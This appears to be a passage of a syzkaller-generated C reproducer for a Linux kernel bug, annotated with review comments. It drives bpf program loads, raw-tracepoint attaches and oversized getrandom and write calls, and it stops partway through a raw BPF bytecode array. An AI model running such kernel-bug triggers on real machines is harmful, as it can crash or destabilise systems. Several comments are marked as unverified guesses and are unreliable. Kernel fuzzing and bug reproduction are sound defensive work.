// https://syzkaller.appspot.com/bug?id=f10ee477162a6f234fa4fc7120fa57a4586533c8
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Reproducer layout (visible part): a small thread/event harness, a
// fork-per-iteration driver (loop), and execute_call(), which replays a
// fixed sequence of syscalls whose arguments live at fixed addresses in
// the 0x20000000 region.  The main() that maps that region and calls
// loop() is not in this excerpt, and execute_call() continues past it.

#define _GNU_SOURCE

// The header names of these includes were lost when the page was
// extracted (only the `#include` keyword survived); they are kept as-is.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

// Fallback syscall numbers (x86-64 values) for headers that predate them.
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
#ifndef __NR_getrandom
#define __NR_getrandom 318
#endif

// Sleep for `ms` milliseconds.  Only ever called with 1 here, so the
// useconds_t range of usleep() is not a concern.
static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

// Monotonic wall-clock time in milliseconds.  A failing clock_gettime()
// terminates the reproducer: every timeout below depends on this value.
static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

// Start a worker thread running fn(arg) with a 128 KiB stack.
// pthread_create() is retried up to 100 times while it fails with EAGAIN
// (thread/resource limits); any other failure, or exhausting the retries,
// exits the process.  The pthread_t is discarded: workers are never joined
// (thr() below never returns), and the attr is only destroyed on success
// because the failure path exits anyway.
static void thread_start(void* (*fn)(void*), void* arg)
{
  pthread_t th;
  pthread_attr_t attr;
  pthread_attr_init(&attr);
  pthread_attr_setstacksize(&attr, 128 << 10);
  int i = 0;
  for (; i < 100; i++) {
    if (pthread_create(&th, &attr, fn, arg) == 0) {
      pthread_attr_destroy(&attr);
      return;
    }
    if (errno == EAGAIN) {
      usleep(50);
      continue;
    }
    break;
  }
  exit(1);
}

// BITMASK(off, len): `len` one-bits starting at bit `off`.
// STORE_BY_BITMASK(type, htobe, addr, val, off, len): read-modify-write of
// the `len`-bit field at bit `off` of the `type` object at `addr`, with
// `htobe` applied on load and store for big-endian fields.  In this file
// it is always used with an empty `htobe` argument and a constant `addr`,
// so the multiple evaluation of `addr` is harmless.
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len)           \
  *(type*)(addr) =                                                         \
      htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) |       \
            (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

// One-shot flag used for thread hand-off: a word that is 0 (clear) or
// 1 (set), waited on through the futex syscall.
typedef struct {
  int state;
} event_t;

// Plain stores: init/reset are only called while no waiter is active.
static void event_init(event_t* ev)
{
  ev->state = 0;
}

static void event_reset(event_t* ev)
{
  ev->state = 0;
}

// Set the flag and wake every waiter.  Setting an already-set event is
// treated as a harness bug and exits.  The release store pairs with the
// acquire loads in event_wait()/event_isset()/event_timedwait(); the huge
// wake count means "wake all".
static void event_set(event_t* ev)
{
  if (ev->state)
    exit(1);
  __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
  syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000);
}

// Block until the flag is set.  FUTEX_WAIT only sleeps while state is
// still 0 and may return spuriously; the loop re-checks the flag.
static void event_wait(event_t* ev)
{
  while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
}

// Non-blocking probe of the flag.
static int event_isset(event_t* ev)
{
  return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}

// Wait at most `timeout` ms for the flag.  Returns 1 if it was set, 0 on
// expiry.  FUTEX_WAIT takes a relative timeout, so the remaining time is
// recomputed on every spurious wake-up; `remain` cannot underflow because
// the loop returns as soon as `now - start` exceeds `timeout`.  The futex
// return value is deliberately ignored (EAGAIN/EINTR are handled by the
// re-check of `state`).
static int event_timedwait(event_t* ev, uint64_t timeout)
{
  uint64_t start = current_time_ms();
  uint64_t now = start;
  for (;;) {
    uint64_t remain = timeout - (now - start);
    struct timespec ts;
    ts.tv_sec = remain / 1000;
    ts.tv_nsec = (remain % 1000) * 1000 * 1000;
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
    if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
      return 1;
    now = current_time_ms();
    if (now - start > timeout)
      return 0;
  }
}

// printf-style write of a formatted string to an existing file.
// Returns false (errno preserved) if the file cannot be opened or the
// write is short.  NOTE(review): the vsnprintf() result is not checked, so
// a formatted string longer than 1023 bytes is silently truncated before
// being written; the only caller passes a 4-byte literal.
static bool write_file(const char* file, const char* what, ...)
{
  char buf[1024];
  va_list args;
  va_start(args, what);
  vsnprintf(buf, sizeof(buf), what, args);
  va_end(args);
  buf[sizeof(buf) - 1] = 0;
  int len = strlen(buf);
  int fd = open(file, O_WRONLY | O_CLOEXEC);
  if (fd == -1)
    return false;
  if (write(fd, buf, len) != len) {
    int err = errno;
    close(fd);
    errno = err;
    return false;
  }
  close(fd);
  return true;
}

// SIGKILL the test child (its whole process group first, then the pid) and
// reap it.  After ~100 ms of polling with WNOHANG, every FUSE connection
// under /sys/fs/fuse/connections is aborted — presumably so a child stuck
// on a FUSE request can die (verify) — and then waitpid() blocks until the
// child is reaped.  The single byte written to the abort file is the first
// character of the path buffer; its value looks irrelevant to the kernel
// (only the write itself triggers the abort) — TODO confirm.  The empty
// `if`/`else` bodies are autogenerated error-ignoring stubs.
// NOTE(review): waitpid(-1, ...) reaps *any* child; that is safe here only
// because loop() forks one child at a time.
static void kill_and_wait(int pid, int* status)
{
  kill(-pid, SIGKILL);
  kill(pid, SIGKILL);
  for (int i = 0; i < 100; i++) {
    if (waitpid(-1, status, WNOHANG | __WALL) == pid)
      return;
    usleep(1000);
  }
  DIR* dir = opendir("/sys/fs/fuse/connections");
  if (dir) {
    for (;;) {
      struct dirent* ent = readdir(dir);
      if (!ent)
        break;
      if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
        continue;
      char abort[300];
      snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
      int fd = open(abort, O_WRONLY);
      if (fd == -1) {
        continue;
      }
      if (write(fd, abort, 1) < 0) {
      }
      close(fd);
    }
    closedir(dir);
  } else {
  }
  while (waitpid(-1, status, __WALL) != pid) {
  }
}

// Per-child setup, run right after fork(): die with the parent
// (PR_SET_PDEATHSIG), become a process-group leader so kill(-pid, ...) in
// kill_and_wait() covers everything the child spawns, and make this
// process the OOM killer's preferred victim.
static void setup_test()
{
  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
  setpgrp();
  write_file("/proc/self/oom_score_adj", "1000");
}

// Worker slot: `created` is set once its thread exists, `call` is the
// program step it should run next, `ready` is signalled by execute_one()
// to start a step and `done` by the worker when the step finished.
struct thread_t {
  int created, call;
  event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
// Number of steps currently executing; only used as a drain counter in
// execute_one(), which is why relaxed atomics suffice.
static int running;

// Worker thread body: wait for a step, run it, signal completion, repeat
// forever (the process exits around it; see thread_start()).
static void* thr(void* arg)
{
  struct thread_t* th = (struct thread_t*)arg;
  for (;;) {
    event_wait(&th->ready);
    event_reset(&th->ready);
    execute_call(th->call);
    __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
    event_set(&th->done);
  }
  return 0;
}

// Run the 20-step program once, in order, each step on the first idle
// worker.  Workers are created lazily; a worker whose previous step has
// not completed (`done` not set) is skipped, so a hung syscall does not
// stall the rest of the program.  Each step gets 50 ms, plus 500 ms for
// steps 2, 3, 5 and 6 (the bpf program loads / raw-tracepoint opens in
// execute_call()).  Afterwards wait up to ~100 ms for stragglers.
static void execute_one(void)
{
  int i, call, thread;
  for (call = 0; call < 20; call++) {
    for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) {
      struct thread_t* th = &threads[thread];
      if (!th->created) {
        th->created = 1;
        event_init(&th->ready);
        event_init(&th->done);
        event_set(&th->done);
        thread_start(thr, th);
      }
      if (!event_isset(&th->done))
        continue;
      event_reset(&th->done);
      th->call = call;
      __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
      event_set(&th->ready);
      event_timedwait(&th->done, 50 + (call == 2 ? 500 : 0) + (call == 3 ? 500 : 0) + (call == 5 ? 500 : 0) + (call == 6 ? 500 : 0));
      break;
    }
  }
  for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
    sleep_ms(1);
}

// Redundant redeclaration (already defined above); harmless, autogenerated.
static void execute_one(void);

#define WAIT_FLAGS __WALL

// Driver: fork a fresh child per iteration, run the program in it, and
// give it 5 s to exit on its own before kill_and_wait() tears it down.
// Runs forever; presumably called from the main() past the end of this
// excerpt.  `iter` is counted but not otherwise used here.
static void loop(void)
{
  int iter = 0;
  for (;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      setup_test();
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      sleep_ms(1);
      if (current_time_ms() - start < 5000)
        continue;
      kill_and_wait(pid, &status);
      break;
    }
  }
}

// Results carried between program steps (mostly bpf fds).  Every slot
// starts as -1 ("not obtained") except r[3], which is filled from a
// kernel-written info field rather than a syscall return value (see the
// cmd 0xf step later in execute_call()).
uint64_t r[8] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

// Execute program step `call`.  All argument structures are built in place
// at fixed addresses in the 0x20000000 region, which the (not shown) main
// is assumed to have mapped — TODO confirm.  Steps that produce an fd
// store it in r[] only when the syscall did not fail.  The earlier
// `static` prototype gives this definition internal linkage despite the
// missing storage class (C11 6.2.2p5).  The body continues beyond the
// visible part of the file.
void execute_call(int call)
{
  intptr_t res = 0;
  switch (call) {
  case 0:
    // getrandom() with an enormous length into the fixed buffer.
    syscall(__NR_getrandom, /*buf=*/0x20000440ul, /*len=*/0x7591fcc76eda37b7ul, /*flags=*/0ul);
    break;
  case 1:
    // madvise() over the whole fixed region; advice 0x15 (MADV_PAGEOUT on
    // Linux, if memory serves — verify).
    syscall(__NR_madvise, /*addr=*/0x20000000ul, /*len=*/0x600003ul, /*advice=*/0x15ul);
    break;
  case 2:
    // bpf(cmd 5 = BPF_PROG_LOAD).  By the bpf_attr prog-load layout the
    // fields are: prog_type 0x11, insn_cnt 5, insns = NULL (!), license
    // -> "syzkaller" — presumably a deliberately invalid load; its fd, if
    // any, is kept in r[0].  The remaining field stores continue on the
    // next line of the file.
    *(uint32_t*)0x20000200 = 0x11;
    *(uint32_t*)0x20000204 = 5;
    *(uint64_t*)0x20000208 = 0;
    *(uint64_t*)0x20000210 = 0x20000180;
    memcpy((void*)0x20000180, "syzkaller\000", 10);
    *(uint32_t*)0x20000218 = 0;
    *(uint32_t*)0x2000021c = 0;
    *(uint64_t*)0x20000220 = 0;
    *(uint32_t*)0x20000228 = 0;
    *(uint32_t*)0x2000022c = 0;
    memset((void*)0x20000230, 0, 16);
    *(uint32_t*)0x20000240 = 0;
*(uint32_t*)0x20000244 = 2; *(uint32_t*)0x20000248 = -1; *(uint32_t*)0x2000024c = 8; *(uint64_t*)0x20000250 = 0; *(uint32_t*)0x20000258 = 0; *(uint32_t*)0x2000025c = 0x10; *(uint64_t*)0x20000260 = 0; *(uint32_t*)0x20000268 = 0; *(uint32_t*)0x2000026c = 0; *(uint32_t*)0x20000270 = 0; *(uint32_t*)0x20000274 = 0; *(uint64_t*)0x20000278 = 0; *(uint64_t*)0x20000280 = 0; *(uint32_t*)0x20000288 = 0x10; *(uint32_t*)0x2000028c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000200ul, /*size=*/0x90ul); if (res != -1) r[0] = res; break; case 3: *(uint64_t*)0x20000200 = 0x200001c0; memcpy((void*)0x200001c0, "sched_process_wait\000", 19); *(uint32_t*)0x20000208 = r[0]; syscall(__NR_bpf, /*cmd=*/0x11ul, /*arg=*/0x20000200ul, /*size=*/0x10ul); break; case 4: sprintf((char*)0x200001c0, "0x%016llx", (long long)0); syscall(__NR_write, /*fd=*/-1, /*buf=*/0x200001c0ul, /*len=*/0xfffffdeful); break; case 5: *(uint32_t*)0x20000200 = 0x11; *(uint32_t*)0x20000204 = 4; *(uint64_t*)0x20000208 = 0x200002c0; memcpy((void*)0x200002c0, "\x18\x01\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x04" "\x85\x00\x00\x00\x6d\x00\x00\x00\x95", 25); *(uint64_t*)0x20000210 = 0x20000100; memcpy((void*)0x20000100, "GPL\000", 4); *(uint32_t*)0x20000218 = 0; *(uint32_t*)0x2000021c = 0; *(uint64_t*)0x20000220 = 0; *(uint32_t*)0x20000228 = 0; *(uint32_t*)0x2000022c = 0; memset((void*)0x20000230, 0, 16); *(uint32_t*)0x20000240 = 0; *(uint32_t*)0x20000244 = 2; *(uint32_t*)0x20000248 = -1; *(uint32_t*)0x2000024c = 8; *(uint64_t*)0x20000250 = 0; *(uint32_t*)0x20000258 = 0; *(uint32_t*)0x2000025c = 0x10; *(uint64_t*)0x20000260 = 0; *(uint32_t*)0x20000268 = 0; *(uint32_t*)0x2000026c = 0; *(uint32_t*)0x20000270 = 0; *(uint32_t*)0x20000274 = 0; *(uint64_t*)0x20000278 = 0; *(uint64_t*)0x20000280 = 0; *(uint32_t*)0x20000288 = 0x10; *(uint32_t*)0x2000028c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000200ul, /*size=*/0x78ul); if (res != -1) r[1] = res; break; case 6: *(uint64_t*)0x20000200 = 
0x20000140; memcpy((void*)0x20000140, "mm_page_alloc\000", 14); *(uint32_t*)0x20000208 = r[1]; syscall(__NR_bpf, /*cmd=*/0x11ul, /*arg=*/0x20000200ul, /*size=*/0x10ul); break; case 7: *(uint32_t*)0x20000280 = 6; *(uint32_t*)0x20000284 = 4; *(uint64_t*)0x20000288 = 0x20002940; memcpy( (void*)0x20002940, "\x18\x02\x00\x00\xe2\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\xc6\x85" "\x00\x00\x00\x36\x00\x00\x00\x95\x00\x00\x18\x00\x00\x00\x00\x92\x2a" "\xe8\x37\x13\xab\x96\x00\x01\x00\x00\x80\x1b\x10\xfb\x54\xa8\xcb\x72" "\xd2\x32\xad\x55\x8c\x46\xff\xf4\x20\x8d\x49\x90\xec\x11\xce\x94\x13" "\xac\x30\xe0\x0b\xd0\x08\x1f\x85\x04\xe1\x9a\x51\x83\xd7\x69\x67\x65" "\x20\xe9\x8a\x26\x33\x45\xe4\x4d\x5a\xd1\x2b\xca\x35\x51\x01\x00\xc4" "\xd8\x6a\xbe\xb1\x23\x03\xff\x1c\x9f\xe0\xd0\x02\x00\x00\xd6\x04\x00" "\x00\x00\x07\xd3\x67\x00\x00\x00\x8a\xff\x66\xd6\xb3\x18\x1f\xfc\x1d" "\x62\xa3\x95\x4c\x11\x98\xbb\xc4\xfa\x13\xae\xe4\x8c\xa9\xe8\x96\x9f" "\xae\xbf\x31\x83\xfe\x80\x3a\xb3\xf5\x02\x4b\x52\xdc\x26\x5b\x36\xfc" "\x9d\xae\x00\xa0\x94\x04\xf0\x1f\x95\x04\xd0\x97\x6d\x25\x2b\xd8\xd2" "\x45\x38\x55\x6e\x5e\x57\xbe\xe3\xb8\xcf\x46\x4e\xf3\xc6\xa7\xde\xf8" "\xba\xd3\xca\x6e\x3a\xbd\xb2\x16\x96\xe3\x40\xbb\x8e\x2a\x09\x3a\xdd" "\x57\x19\x6b\x40\xde\xf3\x85\x8e\xf5\x69\x14\x7f\xa4\x10\x83\x28\x39" "\x2d\x32\x2a\xb5\xdf\x10\xa2\xf6\x9a\x6b\xdf\x72\xee\x79\x44\xe8\x10" "\xd0\x22\x39\x17\xc3\xd0\x42\x41\x0f\x57\x46\x6f\x59\x54\x40\x47\xd6" "\xd8\xac\x44\x06\x00\x00\x00\x00\x00\xee\x16\xc7\x29\x30\x0d\x23\x01" "\x80\x00\x00\x00\x00\x00\x00\x2b\x5a\x8b\x05\xfc\xc1\x54\xad\x52\x90" "\xa8\xcd\xb9\x7c\x34\x3f\x45\x4f\xf6\x9d\xd6\xcb\xde\x49\xb2\x8a\x6c" "\xb5\xf4\xfc\x00\x01\x74\x5c\xff\x6e\x00\xe7\xff\xff\xff\x00\x00\xac" "\xf3\x20\x9a\x08\x43\x9f\x1f\xf0\x17\x79\xb6\xf6\xdf\x7e\x02\xaa\x6d" "\x77\x60\x52\x5b\x59\x5f\xe1\xf6\x97\xbc\x11\x4e\xd1\x77\x8e\x97\xa3" "\xf0\x39\x5f\x94\x69\x74\xcf\xb4\x58\xbe\x2a\x34\xcf\x92\x4d\xc3\x7b" 
"\x55\x92\xbf\x17\x95\x6f\x35\x47\x49\x7a\xba\x81\x43\x82\xff\x67\xb3" "\x45\xb6\x77\xa9\xd6\x52\x3d\x87\x00\x80\x00\x00\x04\x00\x00\x00\x00" "\x00\x3f\xe8\x61\x3c\xa2\x9f\xf9\x2b\xe0\xd8\xde\xff\xff\x7b\x68\x13" "\x6b\x00\x46\xd5\x35\xdd\x39\xc0\xf3\x54\x08\x86\x9e\x9b\x34\x2b\x95" "\x3f\x91\x44\x7e\x6b\x9e\xab\x30\x4f\x13\x43\x06\x32\x06\x00\xa4\x40" "\x95\x25\x4b\x45\xa6\xc1\x31\x2a\x13\x69\x6c\x72\x02\xdf\x5f\x76\x47" "\x13\x50\x4f\xac\xc5\x32\xc5\xa6\xd4\x4d\x99\xec\x75\x30\xed\x7b\x03" "\x11\x00\x00\x00\x00\x00\x00\xe5\x4e\x90\x72\xa2\x2d\x91\x1f\x4a\x2c" "\x2e\x2f\xa8\x06\xe6\x3c\x5c\xd9\x8a\x85\x69\xa6\xd6\xbc\xfb\x00\x00" "\x64\x88\x51\x17\xe2\xad\x91\x0e\xae\x67\xe0\xeb\xe3\x80\xd0\xf6\x48" "\x71\x3e\x68\x15\x35\x79\xe0\x2d\x71\xc5\x8d\x14\x7b\x00\x82\x1a\xb9" "\xa6\x47\x5b\x31\xe1\xeb\xf1\x36\x9a\x04\x00\x00\x00\xfb\xf3\x98\x3f" "\x28\x3f\x2f\x00\x00\x00\x00\x99\x27\x74\x81\x4d\x63\xc9\x33\x91\x2d" "\x00\x00\x06\x00\x00\x00\xa6\x6a\xcb\x0a\x38\x85\x69\x29\xe7\xd8\xb1" "\xb0\x6c\x9b\xd5\xd7\xe5\x49\x0f\x3b\x85\x96\xb6\x94\xea\x94\x83\xbd" "\x4b\xd2\x87\xc8\x3d\xd9\x98\xa7\x46\x94\xd1\x8b\xdd\x8a\xd0\x98\x3b" "\xc9\x07\x70\xbb\xd2\x6a\x82\xb9\xd9\x9d\x5f\xc0\x45\x63\xb5\x23\xc4" "\x7e\xf8\xc3\x34\x00\xe9\x0d\x02\x00\x00\x00\x00\x00\x00\x00\x0e\xdf" "\x11\x47\xa7\xaf\xe7\x72\xcd\x45\xaf\x8a\xef\xfe\x27\x53\x08\x8e\x02" "\xca\x6b\xb2\xfe\xec\x44\x6c\xe7\xdb\xce\x66\xf0\xa9\x3a\x03\x37\x13" "\x20\x98\x08\x65\xc7\xc6\x2e\xa4\xd8\xf8\xa8\x64\xdc\xe9\xfa\x85\xae" "\xb0\x45\x43\x49\x10\x02\x96\xee\x2d\xba\x39\xc3\xf6\xfd\x6c\xf9\x67" "\x14\xe1\x1f\xe0\x3b\x50\x62\x80\x9a\x74\x18\xb1\x65\xdd\x03\x36\xd2" "\x26\xba\xc1\xe1\x22\x3b\xe1\xc9\x7b\x15\x17\x5d\x0e\x66\x4b\xeb\x12" "\x60\x00\xe9\x65\x49\xe1\xa1\x22\x8c\x68\x6e\xdb\x47\x5b\x70\x5e\xaa" "\x95\x15\xc9\x6f\x4f\xc6\xb3\xc9\x25\xea\x40\x4e\x0f\x1d\xe6\x10\x26" "\xdc\x6c\x66\x18\x58\x0f\xd6\xce\x9e\xac\x60\x2c\x17\x56\xf6\xd1\x05" "\x67\x12\x41\x21\x31\xed\x99\x25\x98\x9e\x01\xea\xe4\x89\xec\x70\x52" 
"\xe0\xed\x72\xc3\x26\xc7\xa8\xaa\x63\x99\x9e\x22\x97\xc5\x4c\xe1\x82" "\x2d\x14\xb7\xc7\x69\x9a\x9d\x06\x00\xf1\x1f\x2e\x7f\x47\x4c\xff\xbc" "\x35\xbc\x86\x23\xcd\x5e\xb6\x8a\xf8\x22\x75\xa9\x40\xbe\x04\x00\x00" "\x00\x00\x00\x00\x00\xbc\xc3\xfb\xe7\xd9\x0d\xe9\x6d\x6a\x8e\x9f\x32" "\xf1\x8d\x1f\x60\x6b\x38\x1e\x49\x03\xb5\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x4a\x23\x57\xba\x5f\x60\x00\xde\x1c\xfa\x88\xb7\x16" "\x5d\xcf\x4f\x2a\xae\xe8\x6d\x48\x02\x00\x00\x00\x00\x00\x00\x00\x8f" "\xdb\x68\x6d\x5d\xa2\xa4\x2e\x4b\x50\x24\xb6\x53\x58\x11\xf3\x62\x20" "\x1d\x4f\x82\x01\x2e\x6a\xf7\x04\x97\x3d\x04\xea\x92\x3c\x19\xe6\xcb" "\x72\x3c\x19\x23\xb3\xee\xa2\xd7\x3e\x17\x6d\xff\x38\x3c\x9f\xbb\xac" "\x53\xdf\xdc\xb1\xa6\x8c\x98\xe9\x6f\xe3\x9e\xec\x23\x96\x3f\xaf\x3e" "\xbe\xd3\x40\x91\x44\xc7\xc5\x3d\x63\x18\xce\xd6\x78\x01\x00\x00\x00" "\x9b\x01\xe9\xf2\x77\x2e\x5f\x29\x99\xd3\x43\x5d\xa0\x25\x56\xe3\x6c" "\x32\x15\xd2\xbd\x4e\x96\xc9\x3b\xff\x3a\xd0\x4a\x82\xff\x3c\xfa\xdc" "\xf6\x5e\xb9\x2a\xdc\x6c\x68\xd6\x6b\x11\xcb\x2d\x75\x56\x41\x4a\x86" "\xdf\xa9\x4b\xb7\xaa\x52\xc7\xfe\xbb\x1e\x9b\x2e\xfc\xbb\xc5\xbc\xcf" "\x9d\x39\xbe\xd8\x02\xf4\xf0\x56\x97\x6a\x9a\x36\x2e\xe9\xcc\x62\x4e" "\xc4\x54\xb9\x02\x00\xfd\x96\x03\xf9\x69\x08\xbd\xdc\x14\x50\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\xd9\x17\xc6\x2b\x27" "\x67\x99\x13\x07\x57\x31\xe8\xfd\xdb\x07\xc1\x0c\x82\x00\x2d\x60\x18" "\x15\x88\xae\x63\xa4\x40\x45\x42\x87\xde\x9e\x34\x0f\x61\x12\x67\xf3" "\x7b\xdd\x0f\x2d\x21\xcb\x06\xfc\xaf\x45\xa0\xa2\x97\xe3\x96\xf4\x28" "\xd4\x33\x71\x42\x4b\x30\x7e\xef\x82\xc5\xd6\xd1\x9f\x3e\xf0\xd3\xb8" "\xf7\xfa\x51\x95\x7e\x30\x99\xca\xab\x31\x13\x3b\x34\xa1\xd3\xee\xbc" "\x0f\x0c\x90\x56\xdf\x2e\x96\x67\xba\x0b\x55\x69\x5c\x78\x94\x01\x00" "\x79\xb0\x7e\x7a\xef\x77\x85\xe2\x48\x64\x72\xb5\xcb\xa1\xf3\x34\x6c" "\x1e\x8e\x23\xde\xb8\xc8\x2b\xb6\xeb\x2c\x72\xc4\x84\x24\x1d\xc3\xb6" "\x6d\xa7\x82\x60\xf8\x00\xff\xfd\x39\x36\x8b\x95\x2f\x6f\x4a\x10\x29" 
"\x5c\x50\xc8\x87\xa3\x1d\x8b\x54\x3c\x5d\x10\xf2\xdb\xd4\xd0\xb8\x4e" "\xaa\xd4\x3f\xeb\x6e\x16\x9a\x9f\x2f\xcf\xf7\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\xe0\x11\xbc\x63\x66\xf5\x6f\xa7\x87\xf2\x12\xc1\xf8\xc0" "\xf4\x7f\x50\xb1\xe9\xb5\xd8\x41\xea\x55\xfe\x56\x9b\xb7\xbf\x1e\x78" "\x19\x1c\x8a\x02\xad\x43\x67\x25\x77\x17\x38\xa2\xa9\x88\x91\x97\x1e" "\x3b\x93\x23\x52\x89\x6e\x1e\xa1\x0f\x62\xe8\xef\x7a\x87\xe1\x61\x51" "\xb3\x9d\x6c\x27\x57\x57\x14\x54\x0d\x8c\x29\x3a\x3f\xa4\xb5\xa8\x25" "\x36\x04\x23\xc1\xcb\xc8\xb5\xd1\x91\x67\x15\x28\x23\xed\x85\x31\x40" "\xed\xda\x00\x2c\x16\xc8\x42\xb1\x68\xbb\x55\xf6\xbb\x71\x3d\xeb\x57" "\xd0\xba\xd9\x7a\xd5\x22\xc0\x74\x50\xaa\x78\xd6\xd4\xe5\xfc\x5b\xe2" "\xc4\x02\xbd\x24\x61\x28\xf4\x1b\xcb\x02\x00\x00\x00\x89\x2b\x13\x5a" "\x92\xe8\xc8\x44\x93\x8a\xa9\x8b\xa4\x83\x9a\x14\x08\xa6\x96\x45\x4d" "\x40\xe5\xee\xd4\xd4\xdc\xe4\x81\xca\x86\xbf\xac\x54\xc3\x30\x33\x1b" "\x7f\x2c\xde\x17\xcb\xae\xb0\x37\x76\x96\xfa\xf5\x46\xec\xbe\x74\x2d" "\x73\xd4\x7d\x72\x6a\x50\xf6\xe7\x52\xf3\x32\x52\x55\xbd\x7e\x8b\x59" "\x23\xaa\x3c\xfb\x6f\x7e\x06\x49\x4f\x21\xca\x45\x01\x39\xc5\x58\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x75\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55" "\x60\xbd\x9e\xb8\x1e\x83\x9e\x49\x92\xe6\x4b\x07\x4a\x66\xcc\xcc\xcf" "\x00\x33\x4f\xa9\x4d\xa8\x47\x7b\xe7\xd9\x9b\x55\x8e\xc6\xa5\xb1\x59" "\x6a\xc1\xe7\x61\x7c\x6b\x32\xee\xd0\xcc\x70\x28\x6c\xaf\x2c\x51\x89" "\xa1\x03\xf4\xb0\xb0\x4a\xff\x17\x1c\x4d\x38\x8c\xcf\x67\xfe\xa3\x7e" "\x78\x2f\x02\x5c\x04\xfe\x8b\xa9\x75\xcf\x61\x6c\x71\x34\xd6\x93\x4e" "\x25\x94\xc8\x53\xcd\xe3\x30\xa1\x93\xa9\x67\xd9\x07\xa8\xc8\x8f\xcb" "\x03\x3e\x68\x0f\x55\x9a\x72\x15\x0c\xb9\x00\xba\xfc\xd5\x36\xf4\x87" "\x97\x91\x5a\x2f\xe9\x92\x2c\xe2\x73\x00\x00\x9e\x1b\x36\xaa\x47\x30" "\x11\x7d\x9b\x00\x00\x00\x00\x00\x3c\x63\x00\x00\x00\x00\x00\x00\x8f" "\xbb\xd1\x1b\x01\x5c\x41\x5c\xa0\x41\x92\xfb\xfb\x1a\x8b\x0e\x34\x60" 
"\xaf\x35\x77\x1d\xba\xc1\x00\x62\x83\x5c\x9b\xab\x3a\xd0\x9f\x7a\x02" "\x2c\x52\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7b\xe5\x2c\x0d\x05\xb4\xcd\x12" "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\xc4" "\x73\xc5\x43\x99\xb7\xb8\xaa\x1e\xe4\x61\x32\xfc\x45\xda\x82\x92\x63" "\x11\x78\xce\xcf\x19\x55\x01\x08\xb8\xb8\x42\x3d\xe4\x29\x57\xff\xe9" "\xbb\x6d\x75\x2e\x68\xd2\xbc\x2c\xe7\x77\xa1\x7b\xf4\xdf\xdf\xee\x5d" "\xe0\xf3\xe4\xda\xdf\x51\xab\x03\xd2\x16\x5c\xcc\x95\x62\x82\x7b\x76" "\x2f\xa6\x11\xba\x5f\x32\x86\x1c\x19\xdf\xfe\x1d\xc9\xfd\x5c\x41\xcd" "\x46\xcf\x13\x42\xd6\xb0\xc2\xdd\xad\x90\xac\x33\xf7\x68\xf9\xec\xc7" "\x03\x27\xc5\x99\x18\xfa\x5a\x24\x9b\xef\xe9\x82\x62\xf5\x3c\x81\x82" "\xd9\x5f\x6d\xa3\x69\x8a\x6a\x88\xc2\xc3\x1d\x80\x1a\x8f\x1f\x5e\x0c" "\xe0\x51\x38\xd5\x42\x2d\xa0\xa6\xa6\x2b\x9d\xfe\x1f\x39\x77\x5d\x1d" "\x0c\x91\x86\x09\x64\x15\xf5\x44\xaa\xf7\x6b\x0a\x1c\x87\x7a\x6c\x82" "\x6a\x5a\xdc\xfb\x22\xc4\xa0\xe5\xa4\x62\x71\xca\xa3\xea\xf4\xf3\x89" "\xdd\x5f\x3c\x20\xdb\xdd\xc0\x37\x7a\x42\x66\xd7\xb9\xfd\x61\xb9\x28" "\x7e\x9b\x4b\xe0\xa4\x13\xee\x31\xbe\x0d\xde\xca\xb0\xef\x5f\x25\xcb" 